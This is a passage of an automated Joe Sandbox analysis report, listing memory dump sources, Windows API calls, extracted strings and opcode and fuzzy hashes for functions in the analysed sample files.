                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: }
                                          • API String ID: 176396367-4239843852
                                          • Opcode ID: 062f09f3e4997be56aa785c18914109f794f4c5db4ef65c085cdcd5221d79425
                                          • Instruction ID: 8de648e7d2563ee783569698dbcf99e74bae4f1ce66b15203153df7a06339ff2
                                          • Opcode Fuzzy Hash: 062f09f3e4997be56aa785c18914109f794f4c5db4ef65c085cdcd5221d79425
                                          • Instruction Fuzzy Hash: 8C21C672D043165AEB31EA64EE45F6BB3DCDF92760F09042AF540C3145EB69DD48B3A2
                                          APIs
                                            • Part of subcall function 00F8F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F8F2E4
                                            • Part of subcall function 00F8F2C5: GetProcAddress.KERNEL32(00FC81C8,CryptUnprotectMemory), ref: 00F8F2F4
                                          • GetCurrentProcessId.KERNEL32(?,?,?,00F8F33E), ref: 00F8F3D2
                                          Strings
                                          • CryptProtectMemory failed, xrefs: 00F8F389
                                          • CryptUnprotectMemory failed, xrefs: 00F8F3CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc$CurrentProcess
                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                          • API String ID: 2190909847-396321323
                                          • Opcode ID: 0a72ced650378e6fba2d6ff6930867564d87373d37f5f2a7aaacd803ebcce330
                                          • Instruction ID: 96134f524bead8812190d89812bfa2b5f08cbdb02e0a795dec2a0b0817fd0701
                                          • Opcode Fuzzy Hash: 0a72ced650378e6fba2d6ff6930867564d87373d37f5f2a7aaacd803ebcce330
                                          • Instruction Fuzzy Hash: 37112931A00229AFDF167F25DD42AEE3754FF01770B144126FC01AB251DA349D06BB91
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F8B9B8
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __vswprintf_c_l_swprintf
                                          • String ID: %c:\
                                          • API String ID: 1543624204-3142399695
                                          • Opcode ID: 76dc2d6a1f1bf7dd9e90a39a4c6c5f7dd68908b785221cc689e4dd244e5fa816
                                          • Instruction ID: cd27fa9a1d2616de7123c8f912535770cac09cfee44c2913c723e859354c88ce
                                          • Opcode Fuzzy Hash: 76dc2d6a1f1bf7dd9e90a39a4c6c5f7dd68908b785221cc689e4dd244e5fa816
                                          • Instruction Fuzzy Hash: 7D01F56390031269DA347B398C86EABB7ACEF92770B40440AF945D6182EB28D844E3B1
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00010000,00F91160,?,00000000,00000000), ref: 00F91043
                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00F9108A
                                            • Part of subcall function 00F86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F86C54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                          • String ID: CreateThread failed
                                          • API String ID: 2655393344-3849766595
                                          • Opcode ID: 14255ad3a2a9c2a98eb1bf25730a17e5aa2ef52e5a1f047bc60c6378b5e3321d
                                          • Instruction ID: de1a663ec03ff60e65427c82fcf1e7caf4ed53b270586d7d3a19a598ab53bd93
                                          • Opcode Fuzzy Hash: 14255ad3a2a9c2a98eb1bf25730a17e5aa2ef52e5a1f047bc60c6378b5e3321d
                                          • Instruction Fuzzy Hash: 8D01FE7538430B7FE7306F649D52FB67398FF41751F10003DF68692291CAA1A8957724
                                          APIs
                                            • Part of subcall function 00F8E2E8: _swprintf.LIBCMT ref: 00F8E30E
                                            • Part of subcall function 00F8E2E8: _strlen.LIBCMT ref: 00F8E32F
                                            • Part of subcall function 00F8E2E8: SetDlgItemTextW.USER32(?,00FBE274,?), ref: 00F8E38F
                                            • Part of subcall function 00F8E2E8: GetWindowRect.USER32(?,?), ref: 00F8E3C9
                                            • Part of subcall function 00F8E2E8: GetClientRect.USER32(?,?), ref: 00F8E3D5
                                          • GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                          • SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                          • String ID: 0
                                          • API String ID: 2622349952-4108050209
                                          • Opcode ID: 20bae141d33e5ffe32b4fab1fb25c0d69a3e9804ae2e0410931c109a01d3b994
                                          • Instruction ID: a480784c14cf44e8661687ddc8fe33d5910b0c3981bdecab1cf123c768df931a
                                          • Opcode Fuzzy Hash: 20bae141d33e5ffe32b4fab1fb25c0d69a3e9804ae2e0410931c109a01d3b994
                                          • Instruction Fuzzy Hash: 0AF04F30A4438DABDF152F608C0EBEA3B5DBF45354F048618FC86555A2CB7AC996FB50
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,00F91206,?), ref: 00F90FEA
                                          • GetLastError.KERNEL32(?), ref: 00F90FF6
                                            • Part of subcall function 00F86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F86C54
                                          Strings
                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F90FFF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                          • API String ID: 1091760877-2248577382
                                          • Opcode ID: e09545d369ceaa5d48c0cc74f0a518bcf56d7e780c4191925e7def4c6aa5046e
                                          • Instruction ID: 5acfb56b5adaacb301db9eeef4d8d89a03162693791e6274be77fcd0579ccc52
                                          • Opcode Fuzzy Hash: e09545d369ceaa5d48c0cc74f0a518bcf56d7e780c4191925e7def4c6aa5046e
                                          • Instruction Fuzzy Hash: 1ED02B3194813536DA1033245E46DAE3804AF13332F140714F038901F7CA2549917B92
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00F8DA55,?), ref: 00F8E2A3
                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F8DA55,?), ref: 00F8E2B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FindHandleModuleResource
                                          • String ID: RTL
                                          • API String ID: 3537982541-834975271
                                          • Opcode ID: 80d3da9717ddaf28af0f0cbae417bf92d99dfba8264f61e5879000f9b79268d7
                                          • Instruction ID: 21b720da68674637eb029da6c930cef1c0b2eb319a2dda09e0ce177e051b1840
                                          • Opcode Fuzzy Hash: 80d3da9717ddaf28af0f0cbae417bf92d99dfba8264f61e5879000f9b79268d7
                                          • Instruction Fuzzy Hash: 8FC012316C471066E63037656C4DB837A5C5F01B55F050548B181E91D1D6A5D540ABA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5[_H
                                          • API String ID: 0-3279724263
                                          • Opcode ID: 7dec9d9baf1ef2d3f3f30b42a2e55cb481e147b8e691bef5d8655534e3960821
                                          • Instruction ID: 309ed2b643ff4a2ef5edfea92d0d5225b212eda150b3e994e56804834ad98cd8
                                          • Opcode Fuzzy Hash: 7dec9d9baf1ef2d3f3f30b42a2e55cb481e147b8e691bef5d8655534e3960821
                                          • Instruction Fuzzy Hash: 5F91F1B5918B9D8FE749DB28C865BA9BFE0FB96300F4044BBC04ED73E2CA7858058740
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f49b20f208c073dd0efc1ca931695e73147f42a7af843b582dacf18501d53f4
                                          • Instruction ID: 5ba0050b035efae711ef668fb432dd285a16e6ca6efd94c08170c62a78e32a8b
                                          • Opcode Fuzzy Hash: 2f49b20f208c073dd0efc1ca931695e73147f42a7af843b582dacf18501d53f4
                                          • Instruction Fuzzy Hash: 2C416E5260EA561EE305B37CA0AAEF9BB91DF45361B1848BBD44EC71E3CD14E88282D1
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0141fef487c1e175ed7bb489f2a4f232ca1f0b9b7a7e21f0e13ad3df8724c4f3
                                          • Instruction ID: f7050df013d7f0fee04fc471fab7361c8911a6025b9d4a17541c46b21fe04654
                                          • Opcode Fuzzy Hash: 0141fef487c1e175ed7bb489f2a4f232ca1f0b9b7a7e21f0e13ad3df8724c4f3
                                          • Instruction Fuzzy Hash: 3F11ED31A0E389CFF706DB68C8690AC7FB0EF82715F0581F6C048DB292D9389A4987C4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7412e5eefbf3cee4d017896d5c0d663a0b81959352543bc5ee60f2568868076a
                                          • Instruction ID: 4a935a7f06690c0289e42586eb69063ef86c64ade0a4eb59862f75066041acba
                                          • Opcode Fuzzy Hash: 7412e5eefbf3cee4d017896d5c0d663a0b81959352543bc5ee60f2568868076a
                                          • Instruction Fuzzy Hash: F001E121F0960ACBFA54E758C498AB827D2EF96715F058175D40EC72D6DD28EC4547C4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d5633cbad2ce4c534b23c9c42c6556f6d62d65d91893d3cf12ba034f4a6c525
                                          • Instruction ID: cdc0087eb794fb152faf7c25d67ebe29a197e9af0523de86fffee7a6bad15206
                                          • Opcode Fuzzy Hash: 6d5633cbad2ce4c534b23c9c42c6556f6d62d65d91893d3cf12ba034f4a6c525
                                          • Instruction Fuzzy Hash: 17019E71A0E389CFE706DB64C8650AD7FB0AF83715F1581F6D049DB292E9389A4887C5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction ID: 86ee87dc1c6c1881fe5eeef58c67702c8c372331fe02cb135874a0271d223172
                                          • Opcode Fuzzy Hash: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction Fuzzy Hash: CB018620D1AB1FCBF7A5E718891C7F855D2BF89B18F5481B5C00ED3192DE28AC4946C8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23df1dbb7cbbf8d7b0c8e5a76fbffbc23e238cb004773292a8a3e080c3ce71bf
                                          • Instruction ID: e8d4d8b69fcbecd957ce2e1a72ac96b795145bca6313f997ac74d540bd7f5078
                                          • Opcode Fuzzy Hash: 23df1dbb7cbbf8d7b0c8e5a76fbffbc23e238cb004773292a8a3e080c3ce71bf
                                          • Instruction Fuzzy Hash: B7017C7090E3C9CFE716DB64C8684AD7FB0AF82705F1481E6D049DB292E9389A4887C5
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction ID: afa5fadb8896ebe00f01c98895097a0f7da598a02079d46a6e2dbfc4e616abbb
                                          • Opcode Fuzzy Hash: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction Fuzzy Hash: DBF0F431D1960ECBFB55EB04C898AF877A2EF95725F1481B9C40ED7191CE38AD8587C4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction ID: be2c8d400c3684878759b24f03571d6187fe193848238fe466e6a07783b169c7
                                          • Opcode Fuzzy Hash: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction Fuzzy Hash: 80F05421E0960ACBFB55E704C8886F823A2AF82768F1482B5C40DD72D2CE28ED4946C4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction ID: cbffc48ed1a14de141dbf613c2c80a2940a0907249ef64009471f7fb8bd7af0a
                                          • Opcode Fuzzy Hash: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction Fuzzy Hash: 36E01230D0D11ACBF794A714C8597FD6291DF95704F1080B4D50D932C2DD38AE858BC8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction ID: 06e7593a7caac9ac3b30a25a0a777880abc46973f8071f3f5b30b32d33fd1e9a
                                          • Opcode Fuzzy Hash: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction Fuzzy Hash: 47E01252E5D6458BF798A7A8493A3BC94C19B9AB44F49817DD48EC32C3DC085C4403DA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction ID: 19691308ad2c5671c016dd3e5353566fb391e6050872bbfc0c44bde017c54dc2
                                          • Opcode Fuzzy Hash: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction Fuzzy Hash: B1D0A73061994E9FE701B77CD8494547BA0EB1F215BC910E1D00CC71A1D50489558740
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction ID: 801621f0ca7f9d56934aac64f32a84e8219135596e90137337cb371bb597f4c9
                                          • Opcode Fuzzy Hash: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction Fuzzy Hash: B3C0123051190C8FDA48EB29C888D1473A0FB1A308B9940D4E00DCB2A1D66AECC6CB85
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction ID: 330de71b3dc21b6830072500c61df51b5e17a35f8a49194063ecf300371df22e
                                          • Opcode Fuzzy Hash: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction Fuzzy Hash: B6C04C05E5B71BC3B415776E584E1BCA9405BD7E1DFE58172D50C800C1AC4DA8DD01DE
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c126eeee5b85869faa9e223c1c181fb27355fc7b68f9c251f648b4d1da3ef4ba
                                          • Instruction ID: 2d80717ab55b07a7b2dc00a0abafe8a435d0e942e4759fe1d8a0881729243dae
                                          • Opcode Fuzzy Hash: c126eeee5b85869faa9e223c1c181fb27355fc7b68f9c251f648b4d1da3ef4ba
                                          • Instruction Fuzzy Hash: 00C04C51E1C96A57F1567628C01157D04425B45754F5584B5E00FC73C6CD0C6B0517CA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction ID: 79a28f965c6b047a76e96d951a46a6ee22f22b7439dc935476347855ffd9d9f3
                                          • Opcode Fuzzy Hash: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction Fuzzy Hash: 95B01200C5750F82B404337A084A17878805B87508FD04070D80CC0081AC4D949C02DB